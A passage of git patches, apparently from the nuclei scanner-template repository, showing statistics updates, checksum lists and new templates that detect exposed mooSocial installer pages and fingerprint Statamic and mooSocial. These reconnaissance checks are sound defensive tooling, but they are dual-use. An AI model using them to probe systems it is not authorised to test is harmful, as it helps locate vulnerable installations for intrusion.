1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| oxid | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| new-year-firework_project | 1 | | | | | | | | | +| daily-prayer-time-for-mosques | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| mastown-mastodon-instance | 1 | | | | | | | | | +| orcus | 1 | | | | | | | | | +| filr | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| mstore-api | 1 | | | | | | | | | +| akhq | 1 | | | | | | | | | +| naija-planet | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| js-analyse | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| wp-slimstat | 1 | | | | | | | | | +| objectinjection | 1 | | | | | | | | | +| gzforum | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| monstracms | 1 | | | | | | | | | +| icearp | 1 | | | | | | | | | +| learning-management-system | 1 | | | | | | | | | +| collibra-properties | 1 | | | | | | | | | +| instructables | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| extplorer | 1 | | | | | | | | | +| pluginbazaar | 1 | | | | | | | | | +| plausible | 1 | | | | | | | | | +| mylittleadmin | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| sugar | 1 | | | | | | | | | +| wpovernight | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| seowonintech | 1 | | | | | | | | | +| logstash | 1 | | | | | | | | | +| totemo | 1 | | | | | | | | | +| armorgames | 1 | | | | | | | | | +| intellifuel | 1 | | | | | | | | | +| canto | 1 | | | | | | | | | +| domaincheckplugin | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| masteriyo | 1 | | | | | | | | | +| land-software | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| aria2 | 1 | | | | | | | | | +| cdapl | 1 | | | | | | | | | +| idehweb | 1 | | | | | | | | | +| ltrace | 1 | | | | | | | | | +| php_curl_class_project | 1 | | | | | | | | | +| home-assistant | 1 | | | | | | | | | +| mastonyc-mastodon-instance | 1 | | | | | | | | | +| age-gate | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| sns | 1 | | | | | | | | | +| je_form_creator | 1 | | | | | | | | | +| user-meta | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| bws-error-log | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| Blogengine | 1 | | | | | | | | | +| nitely | 1 | | | | | | | | | +| mt | 1 | | | | | | | | | +| cvsweb | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| pmm | 1 | | | | | | | | | +| com_janews | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| shoowbiz | 1 | | | | | | | | | +| rhadamanthys | 1 | | | | | | | | | +| mdc_youtube_downloader_project | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| timeout | 1 | | | | | | | | | +| tbk | 1 | | | | | | | | | +| shutterstock | 1 | | | | | | | | | +| loancms | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| zeta-producer | 1 | | | | | | | | | +| zenrows | 1 | | | | | | | | | +| joommasters | 1 | | | | | | | | | +| emulator | 1 | | | | | | | | | +| 7dach | 1 | | | | | | | | | +| xvideos-profiles | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| phoenix | 1 | | | | | | | | | +| webp_converter_for_media_project | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| contest_gallery | 1 | | | | | | | | | +| give | 1 | | | | | | | | | +| expect | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| simple-membership-plugin | 1 | | | | | | | | | +| easy-digital-downloads | 1 | | | | | | | | | +| wmw | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| greenbone | 1 | | | | | | | | | +| show-all-comments-in-one-page | 1 | | | | | | | | | +| ics | 1 | | | | | | | | | +| xtreamerat | 1 | | | | | | | | | +| zatrybipl | 1 | | | | | | | | | +| caringbridge | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| rg-uac | 1 | | | | | | | | | +| ninja-forms | 1 | | | | | | | | | +| hydra_project | 1 | | | | | | | | | +| microsoft-teams | 1 | | | | | | | | | +| helmet_store_showroom_project | 1 | | | | | | | | | +| readtomyshoe_project | 1 | | | | | | | | | +| tixeo | 1 | | | | | | | | | +| ecommerce-product-catalog | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | +| parsi-font_project | 1 | | | | | | | | | +| realtyna | 1 | | | | | | | | | +| rumbleuser | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| alcatel | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| digital-ocean | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| microsoft-technet-community | 1 | | | | | | | | | +| itchio | 1 | | | | | | | | | +| apsystems | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| polywork | 1 | | | | | | | | | +| cakephp | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| motioneye | 1 | | | | | | | | | +| hacker-news | 1 | | | | | | | | | +| redv | 1 | | | | | | | | | +| fancentro | 1 | | | | | | | | | +| choom | 1 | | | | | | | | | +| mastodon-mastodon | 1 | | | | | | | | | +| fox | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| litmindclub-mastodon-instance | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| enterprise | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| cookieinformation | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| sri | 1 | | | | | | | | | +| tunefind | 1 | | | | | | | | | +| httpbrowser | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| amentotech | 1 | | | | | | | | | +| webasyst | 1 | | | | | | | | | +| elbtide | 1 | | | | | | | | | +| xwiki | 1 | | | | | | | | | +| playtube | 1 | | | | | | | | | +| powerchute | 1 | | | | | | | | | +| bugcrowd | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| franklin | 1 | | | | | | | | | +| nawk | 1 | | | | | | | | | +| popup-builder | 1 | | | | | | | | | +| webtoprint | 1 | | | | | | | | | +| flatpm | 1 | | | | | | | | | +| kfm_project | 1 | | | | | | | | | +| easyen | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| phpgedview | 1 | | | | | | | | | +| visser | 1 | | | | | | | | | +| exposed | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| sexworker | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| affiliates-manager | 1 | | | | | | | | | +| basicrat | 1 | | | | | | | | | +| aaha-chat | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| underconstruction_project | 1 | | | | | | | | | +| sunshinephotocart | 1 | | | | | | | | | +| openmediavault | 1 | | | | | | | | | +| trumani | 1 | | | | | | | | | +| kybernetika | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| ipanel | 1 | | | | | | | | | +| pornhub-porn-stars | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| linshare | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| clipbucket | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| kmc_information_systems | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| ipdata | 1 | | | | | | | | | +| cpulimit | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| opennebula | 1 | | | | | | | | | +| roboform | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| idangero | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| anyscale | 1 | | | | | | | | | +| ovpn | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| scoreme_project | 1 | | | | | | | | | +| clubhouse | 1 | | | | | | | | | +| mail-masta_project | 1 | | | | | | | | | +| furaffinity | 1 | | | | | | | | | +| label-studio | 1 | | | | | | | | | +| hcommonssocial-mastodon-instance | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| goodlayerslms | 1 | | | | | | | | | +| pivotal | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| ictprotege | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| fandalism | 1 | | | | | | | | | +| yelp | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| rebuild | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| jvtwitter | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| advance-custom-field | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| mapstodonspace-mastodon-instance | 1 | | | | | | | | | +| katz | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| fark | 1 | | | | | | | | | +| hcl | 1 | | | | | | | | | +| mastodon-rigczclub | 1 | | | | | | | | | +| expressionalsocial-mastodon-instance | 1 | | | | | | | | | +| presspage | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| aiohttp | 1 | | | | | | | | | +| posthog | 1 | | | | | | | | | +| report | 1 | | | | | | | | | +| behance | 1 | | | | | | | | | +| jinhe | 1 | | | | | | | | | +| aa-exec | 1 | | | | | | | | | +| secure-copy-content-protection | 1 | | | | | | | | | +| elasticpot | 1 | | | | | | | | | +| machform | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| microfinance_management_system_project | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| blueflyingfish.no-ip | 1 | | | | | | | | | +| gameconnect | 1 | | | | | | | | | +| sandhillsdev | 1 | | | | | | | | | +| pinkbike | 1 | | | | | | | | | +| lucy | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| vgm | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| osu | 1 | | | | | | | | | +| counteract | 1 | | | | | | | | | +| cryptobox | 1 | | | | | | | | | +| snapchat-stories | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| kipin | 1 | | | | | | | | | +| register | 1 | | | | | | | | | +| servmask | 1 | | | | | | | | | +| couch | 1 | | | | | | | | | +| ocomon | 1 | | | | | | | | | +| openwire | 1 | | | | | | | | | +| wp-paytm-pay | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| amprion | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 7b379864a3..a06f58e212 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | From 6c751fa3ddebec428f58ba6aab10fee47c5849ad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 11:00:05 +0000 Subject: [PATCH 0773/1768] Auto README Update [Fri May 10 11:00:05 UTC 2024] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 1c86981e3d..61f5f3b16e 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 | -| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 | -| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | | -| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | | -| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | | -| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | | +| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | +| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | +| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | +| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | +| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | +| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 260 | ssl | 29 | | | | | -| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 602 | geeknik | 230 | dast | 21 | | | | | +| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | +| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | -**633 directories, 8625 files**. +**638 directories, 8694 files**. From 6c43f80398e552d386533fa74da33e516e5b69f2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 May 2024 16:49:20 +0530 Subject: [PATCH 0774/1768] Create moosocial-installer.yaml --- .../installer/moosocial-installer.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/misconfiguration/installer/moosocial-installer.yaml diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml new file mode 100644 index 0000000000..fcb963e43f --- /dev/null +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -0,0 +1,27 @@ +id: moosocial-installer + +info: + name: mooSocial Installation - Exposure + author: ritikchaddha + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: html:"mooSocial Installation" + tags: exposure,moosocial,misconfig,install + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to mooSocial Installation' + + - type: status + status: + - 200 From 5b6673c162b1beb2e93fcf81923ea283a5c42d39 Mon Sep 17 00:00:00 2001 From: idealphase Date: Fri, 10 May 2024 23:09:05 +0700 Subject: [PATCH 0775/1768] Update favicon-detect.yaml Added mooSocial favicon https://moosocial.com/ --- http/technologies/favicon-detect.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 4ebee77d3f..0f2e2aa252 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -2,7 +2,7 @@ id: favicon-detect info: name: favicon-detection - author: un-fmunozs,DhiyaneshDk + author: un-fmunozs,DhiyaneshDk,idealphase severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 @@ -3736,8 +3736,13 @@ http: dsl: - "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))" + - type: dsl + name: "mooSocial" + dsl: + - "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c5613a5a0cf6abacf4895de42c95ec8b316479ea03c21cf335e942cbcf87ccf022100877e480c73ae4cfbba3520153c4792344db60a7b3a44c138faf845db3bd10fdf:922c64590222798bb761d5b6d8e72950 From c5158ffbe20c7bc1ff684134987bd22cd2a97bc5 Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Fri, 10 May 2024 12:31:42 -0500 Subject: [PATCH 0776/1768] Create statamic-detect.yaml Add new detection template for Statamic CMS --- http/technologies/statamic-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 http/technologies/statamic-detect.yaml diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml new file mode 100644 index 0000000000..9b5d841b29 --- /dev/null +++ b/http/technologies/statamic-detect.yaml @@ -0,0 +1,20 @@ +id: statamic-detect + +info: + name: Statamic Detection + description: Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. + reference: https://github.com/statamic/cms + author: geeknik + severity: info + tags: tech,statamic + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - 'X-Powered-By: Statamic' From 3978e6cf80631aec5aa198e6b7f2c057527354d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:28:34 +0000 Subject: [PATCH 0777/1768] Auto Generated New Template Addition List [Sat May 11 09:28:34 UTC 2024] :robot: --- .new-additions | 66 +------------------------------------------------- 1 file changed, 1 insertion(+), 65 deletions(-) diff --git a/.new-additions b/.new-additions index ed15c7d37d..6adb054b53 100644 --- a/.new-additions +++ b/.new-additions @@ -1,65 +1 @@ -http/cves/2015/CVE-2015-4455.yaml -http/cves/2019/CVE-2019-7139.yaml -http/cves/2023/CVE-2023-1892.yaml -http/cves/2023/CVE-2023-2227.yaml -http/cves/2023/CVE-2023-27032.yaml -http/cves/2023/CVE-2023-2948.yaml -http/cves/2023/CVE-2023-2949.yaml -http/cves/2023/CVE-2023-31446.yaml -http/cves/2023/CVE-2023-32077.yaml -http/cves/2023/CVE-2023-38964.yaml -http/cves/2023/CVE-2023-43208.yaml -http/cves/2023/CVE-2023-44812.yaml -http/cves/2023/CVE-2023-4521.yaml -http/cves/2023/CVE-2023-45375.yaml -http/cves/2023/CVE-2023-46347.yaml -http/cves/2023/CVE-2023-4973.yaml -http/cves/2023/CVE-2023-5003.yaml -http/cves/2023/CVE-2023-6389.yaml -http/cves/2023/CVE-2023-6989.yaml -http/cves/2024/CVE-2024-0235.yaml -http/cves/2024/CVE-2024-0881.yaml -http/cves/2024/CVE-2024-1183.yaml -http/cves/2024/CVE-2024-22927.yaml -http/cves/2024/CVE-2024-2340.yaml -http/cves/2024/CVE-2024-23917.yaml -http/cves/2024/CVE-2024-24131.yaml -http/cves/2024/CVE-2024-27956.yaml -http/cves/2024/CVE-2024-2876.yaml -http/cves/2024/CVE-2024-3136.yaml -http/cves/2024/CVE-2024-31621.yaml -http/cves/2024/CVE-2024-31848.yaml -http/cves/2024/CVE-2024-31849.yaml -http/cves/2024/CVE-2024-31850.yaml -http/cves/2024/CVE-2024-31851.yaml -http/cves/2024/CVE-2024-32399.yaml -http/cves/2024/CVE-2024-32640.yaml -http/cves/2024/CVE-2024-32651.yaml -http/cves/2024/CVE-2024-33575.yaml -http/cves/2024/CVE-2024-33724.yaml -http/cves/2024/CVE-2024-4040.yaml -http/cves/2024/CVE-2024-4348.yaml -http/default-logins/crushftp/crushftp-anonymous-login.yaml -http/default-logins/crushftp/crushftp-default-login.yaml -http/default-logins/soplanning/soplanning-default-login.yaml -http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml -http/exposed-panels/bonobo-server-panel.yaml -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml -http/exposed-panels/cyberchef-panel.yaml -http/exposed-panels/femtocell-panel.yaml -http/exposed-panels/monitorr-panel.yaml -http/exposed-panels/openwebui-panel.yaml -http/exposed-panels/teamforge-panel.yaml -http/exposed-panels/tixeo-panel.yaml -http/exposed-panels/umami-panel.yaml -http/misconfiguration/installer/eyoucms-installer.yaml -http/misconfiguration/installer/sabnzbd-installer.yaml -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml -http/misconfiguration/titannit-web-exposure.yaml -http/takeovers/squadcast-takeover.yaml -http/vulnerabilities/citrix/citrix-oob-memory-read.yaml -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml -http/vulnerabilities/titan/titannit-web-rce.yaml -http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml -network/detection/aix-websm-detect.yaml -network/detection/bluecoat-telnet-proxy-detect.yaml +http/misconfiguration/installer/phpmyfaq-installer.yaml From 9b62de76cce5837247995f5f6e6c5df4adf8b171 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:28:39 +0000 Subject: [PATCH 0778/1768] Auto Generated Templates Checksum [Sat May 11 09:28:39 UTC 2024] :robot: --- templates-checksum.txt | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b46a6a2fef..2b7a03afae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:70736c6faaf92554e4711d1ccdb709abe1ccfb0d +README.md:6c60460e1b0f948b5ee382edcedf044ba5aff856 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:dd9a2992caeffaa53bbda5f3166a5f2df1dc3210 -TEMPLATES-STATS.md:47130017e50921075ff79d152501d5e3ac88eb0b -TOP-10.md:19dc2fecaf3933fe8c0c250b8c2ebfa0fa89854c +TEMPLATES-STATS.json:f43402ca0284acc690f4d239afd477488d220182 +TEMPLATES-STATS.md:7d758b52f7d1c73e19018bddb902f0076bd4a867 +TOP-10.md:3e73524df2b18729f1e3def717dac5e973708c14 cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 @@ -3273,12 +3273,12 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d -http/cves/2024/CVE-2024-31621.yaml:a8be34655c70d85af9a56ca6f57228c1c0cd0b78 +http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:73046107ec5e2333ffbfbc9048afe6d20f6401ac +http/cves/2024/CVE-2024-32399.yaml:afc357068e3f6e9ef3aa6910a122ee7bd47ac60d http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 @@ -3627,7 +3627,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:eb3de9785c4ec199f308428c8f25e37d43d94b93 +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:bae531af7faf23fccf9f5e1bf192fbc14ffc9969 http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -5420,6 +5420,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d +http/misconfiguration/installer/phpmyfaq-installer.yaml:c854a51d6f8e9bbbe41deec1965f973a7e753aa5 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 @@ -5655,7 +5656,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 -http/misconfiguration/titannit-web-exposure.yaml:ca61b80c8d10fe5c8b27923a98bddddb9461c842 +http/misconfiguration/titannit-web-exposure.yaml:90a7e87de3dc02e6f213e29f4d6bce3359464041 http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -8499,7 +8500,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:07fe2e75905885b44a32ce84cd835eb6768bd265 +templates-checksum.txt:03f78448d513dc484792dff6b49195c220854bf7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 94cbc32d6ed7d778a2fdb8b6d77d1c7c488f4618 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:29:13 +0000 Subject: [PATCH 0780/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 66 +--------------------------- 1 file changed, 1 insertion(+), 65 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 11e44b532c..de8ff83bd5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,71 +3,7 @@ on: push: paths: - '.new-additions' - - 'http/cves/2015/CVE-2015-4455.yaml' - - 'http/cves/2019/CVE-2019-7139.yaml' - - 